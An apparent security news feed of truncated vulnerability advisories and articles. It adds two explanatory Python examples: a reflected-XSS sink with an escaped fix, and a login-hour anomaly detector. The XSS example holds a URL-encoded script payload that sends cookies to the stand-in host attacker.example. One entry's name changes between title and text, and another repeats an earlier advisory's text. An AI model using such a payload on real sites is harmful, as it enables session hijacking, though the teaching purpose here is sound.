U.S. Dept Of Defense: Reflected XSS [██████]
Reflected cross-site scripting (XSS) arises when an application receives data in an HTTP request and includes that data within the immediate response in an unsafe way. An attacker can execute arbitrary JavaScript in the victim's session. Steps To Reproduce: Go to this URL:...
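The mechanism described above, as an added example that is not part of the report: a server-side handler that reflects a search parameter into the response body unescaped, beside a hardened version that HTML-entity-encodes it. The query string, the parameter name `q` and the helper names are assumptions chosen for illustration, not taken from the DoD finding.

```python
import html
from urllib.parse import parse_qs

# Constructed request: the 'q' parameter carries a cookie-stealing script payload.
# Decoded it reads <script>document.location='https://attacker.example/?'+document.cookie</script>
# (Example input, not taken from the original report.)
SAMPLE_QUERY = (
    "q=%3Cscript%3Edocument.location%3D%27https%3A%2F%2Fattacker.example%2F%3F%27"
    "%2Bdocument.cookie%3C%2Fscript%3E"
)


def search_param(query_string: str) -> str:
    """Return the decoded 'q' parameter of a query string (empty if absent)."""
    return parse_qs(query_string).get("q", [""])[0]


def render_vulnerable(query_string: str) -> str:
    """Reflects the search term into the HTML body without encoding: a reflected XSS sink."""
    term = search_param(query_string)
    return f"<h1>Results for {term}</h1>"


def render_hardened(query_string: str) -> str:
    """Entity-encodes the term before placing it in an element body and in a quoted attribute.

    quote=True also encodes ' and ", so the same value is safe inside value="...".
    Encoding is context-specific: this helper is NOT sufficient for a JavaScript
    string, a URL, or an unquoted attribute.
    """
    term = html.escape(search_param(query_string), quote=True)
    return f'<h1>Results for {term}</h1><input name="q" value="{term}">'


def reflects_raw_script(body: str) -> bool:
    """Crude proof-of-concept check: does the response contain an unencoded <script tag?"""
    return "<script" in body.lower()


if __name__ == "__main__":
    print(render_vulnerable(SAMPLE_QUERY))   # payload lands in the page as live markup
    print(render_hardened(SAMPLE_QUERY))     # payload is rendered as visible text
```

The hardened function only moves the problem if the template later inserts the value into a different context (an inline event handler, a `javascript:` URL, a `<script>` block); pick the encoder for the context in which the data lands, and treat a Content Security Policy as defence in depth rather than a substitute for output encoding.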
SAP Business One has unspecified vulnerabilities
SAP Business One is a suite of enterprise management software from SAP, a German company. SAP Business One has a security vulnerability that stems from a lack of authorization checks in its service-level components, which an attacker could exploit to read, modify, or delete restricted dat...
How profiling employee working hours helps to detect security incidents
At the TimeMachine company there are two old friends, Bob and Alice. Bob, as a team manager, usually has a very busy schedule filled with meetings all day long. You can even find him working late into the night trying to catch up on the email he received during the day. Alice, on the other hand,...
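The technique named in this entry's title, as an added example that is not code from the original post: build a per-user profile of the hours at which each account normally logs in, then flag logins at hours that account has not used. The log format, the users bob and alice, the two-week baseline and the events scored against it are all constructed here for illustration.

```python
from collections import Counter, defaultdict
from datetime import datetime, timedelta


def make_sample_log() -> list:
    """Constructed baseline: 'YYYY-MM-DD HH:MM:SS user EVENT', ten working days.

    Bob (manager) logs in at 08:00 and again at 21:00 and 23:00 for email catch-up;
    Alice logs in at 09:00 and 13:00. Synthetic data, not from the original post.
    """
    lines = []
    start = datetime(2021, 8, 2)  # a Monday
    for day in range(14):
        d = start + timedelta(days=day)
        if d.weekday() >= 5:          # weekends carry no logins in this sample
            continue
        for hour in (8, 21, 23):
            lines.append(f"{d:%Y-%m-%d} {hour:02d}:15:00 bob LOGIN")
        for hour in (9, 13):
            lines.append(f"{d:%Y-%m-%d} {hour:02d}:05:00 alice LOGIN")
    return lines


# Constructed events to score against the baseline (same format).
SCORE_LOG = [
    "2021-08-16 22:40:00 bob LOGIN",      # late, but normal for Bob
    "2021-08-16 23:10:00 alice LOGIN",    # late, unusual for Alice
    "2021-08-16 10:20:00 alice LOGIN",    # ordinary for Alice
    "2021-08-16 03:00:00 bob LOGIN",      # unusual even for Bob
    "2021-08-16 10:00:00 mallory LOGIN",  # account with no history at all
]


def parse_line(line: str):
    """Split one log line into (timestamp, user, event)."""
    date, time, user, event = line.split()
    return datetime.fromisoformat(f"{date} {time}"), user, event


def build_profile(lines) -> dict:
    """Per-user histogram of login hour-of-day over the baseline window."""
    hours = defaultdict(Counter)
    for ts, user, event in map(parse_line, lines):
        if event == "LOGIN":
            hours[user][ts.hour] += 1
    return hours


def usual_hours(profile: dict, user: str, min_share: float = 0.05, slack: int = 1) -> set:
    """Hours that carry at least min_share of the user's logins, widened by +/- slack hours
    so a meeting overrunning by half an hour does not raise an alert. Unknown user -> empty set."""
    counts = profile.get(user)
    if not counts:
        return set()
    total = sum(counts.values())
    core = {h for h, c in counts.items() if c / total >= min_share}
    return {(h + d) % 24 for h in core for d in range(-slack, slack + 1)}


def find_anomalies(lines, profile: dict, min_share: float = 0.05, slack: int = 1) -> list:
    """Return (user, timestamp) for each LOGIN outside that user's usual hours.
    Accounts with no baseline are always flagged: a brand-new identity is worth a look."""
    flagged = []
    for ts, user, event in map(parse_line, lines):
        if event == "LOGIN" and ts.hour not in usual_hours(profile, user, min_share, slack):
            flagged.append((user, ts.isoformat(sep=" ")))
    return flagged


if __name__ == "__main__":
    prof = build_profile(make_sample_log())
    for user, ts in find_anomalies(SCORE_LOG, prof):
        print(f"ANOMALY {ts} {user}")
```

Two caveats a practitioner would add before relying on this: the baseline is only as clean as the window it was built from (an attacker already present during those weeks teaches the profile to accept their hours), and hour-of-day only makes sense once timestamps are normalised to the user's working time zone and weekdays are separated from weekends.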
Connected Farms Easy Pickings for Global Food Supply-Chain Hack
A group of hackers gave an unnerving DEF CON 29 presentation showing how the sprawling growth of digital and automated farming has left the world's food supply chain vulnerable to cyberattack. A video put out this week for the DEF CON 29 hacker conference by the group Sick Codes explained that modern...
Information Leakage Vulnerability in SSL VPN of Beijing NetGalaxy Information Technology Co.
Beijing Nethub Information Technology Co., Ltd. was renamed from Lenovo Nethub Technology (Beijing) Co., Ltd. Its business covers network border security protection, application and data security protection, network-wide security risk management, professional security solutions and professional...
Securing Personally Identifiable Information (PII) in web applications
PII is the acronym for "personally identifiable information". In plain language, this means information that is exclusive to a specific individual. Because of that exclusivity, it serves to identify, locate, and secure specific persons. For instance, think of that specific...
CVE-2021-37587
In Charm 0.43, any single user can decrypt DAC-MACS or MA-ABE-YJ14 data...
CVE-2021-37588
CVE-2021-37588 (Charm 0.43): Charm 0.43 contains a cryptographic issue that allows any two users to collude to decrypt YCT14 data. The vulnerability, documented across multiple sources (NVD, Red Hat, OSV, CNNVD, etc.), is a cryptographic flaw rather than a typical software bug in a sin...
Anyone for Alphabet Soup? ZTNA, SWGs, MFA, and More: Lessons Learned from Fed Day CyberThreats 2021
Last week, we gathered a few of the most prominent leaders and experts from every corner of the federal space to talk about all things cybersecurity and digital transformation. Discussions ranged from the move toward Zero Trust Network Access (ZTNA) and effectively managing identities and access...
How to protect your CAD data files with MIP and HALOCAD
This blog post is part of the Microsoft Intelligent Security Association guest blog series. Learn more about MISA. Computer-aided design (CAD) files are used by design professionals in the manufacturing, engineering, architecture, surveying, and construction industries. These highly valuable files...
Oracle PeopleSoft Enterprise PeopleTools Unauthorized Access Vulnerability (CNVD-2021-54718)
Oracle PeopleSoft Enterprise PeopleTools provides a comprehensive set of development tools to support the development and runtime of PeopleSoft applications. Oracle PeopleSoft Enterprise PeopleTools versions 8.57, 8.58 and 8.59 have a security vulnerability in the SQR component. An attacker could u...
CVE-2021-2362
Vulnerability in the Oracle Field Service product of Oracle E-Business Suite component: Wireless. Supported versions that are affected are 12.1.1-12.1.3. Easily exploitable vulnerability allows low privileged attacker with network access via HTTP to compromise Oracle Field Service. Successful...
Oracle Outside In Technology has an unspecified vulnerability (CNVD-2021-56432)
Oracle Outside In Technology is a software development kit (SDK) that provides developers with a comprehensive solution for extracting, normalizing, cleaning, converting, and viewing content in more than 600 unstructured file formats. The Filters component contains a security vulnerability. The...
CVE-2021-2341
Vulnerability in the Java SE, Oracle GraalVM Enterprise Edition product of Oracle Java SE component: Networking. Supported versions that are affected are Java SE: 7u301, 8u291, 11.0.11, 16.0.1; Oracle GraalVM Enterprise Edition: 20.3.2 and 21.1.0. Difficult to exploit vulnerability allows...
Oracle Fusion Middleware security vulnerability
Oracle Outside In Technology is a software development kit (SDK) that provides developers with a comprehensive solution for extracting, normalizing, cleaning, converting, and viewing content in more than 600 unstructured file formats. The Filters component contains a security vulnerability. The...
How to leverage accountability to ensure sustainable enterprise data security
As post-pandemic economic recovery continues to drive rapid acceleration in digital transformation, documented data breaches and service disruptions caused by cybercriminal activity have become an unwelcome part of our daily news feed. In spite of the regulations and compliance requirements that...
New Zero-Trust API Offers Mobile Carrier Authentication to Developers
Zero Trust is increasingly being adopted as the best strategy to maintain application security and prevent data breaches. To help achieve progress on Zero Trust, there is now a new, easy way to implement continuous user verification by connecting directly to the authentication systems used by...
CVE-2021-33671
SAP NetWeaver Guided Procedures Administration Workset, versions 7.10, 7.20, 7.30, 7.31, 7.40 and 7.50, does not perform necessary authorization checks for an authenticated user, resulting in escalation of privileges. The impact of missing authorization could result in abuse of functionality...
IBM Guardium Data Encryption Information Disclosure Vulnerability
IBM Guardium Data Encryption (GDE) is a data security and compliance software application from IBM, USA. A security vulnerability exists in IBM Guardium Data Encryption that stems from the application's failure to properly limit the number of interactions, which could be...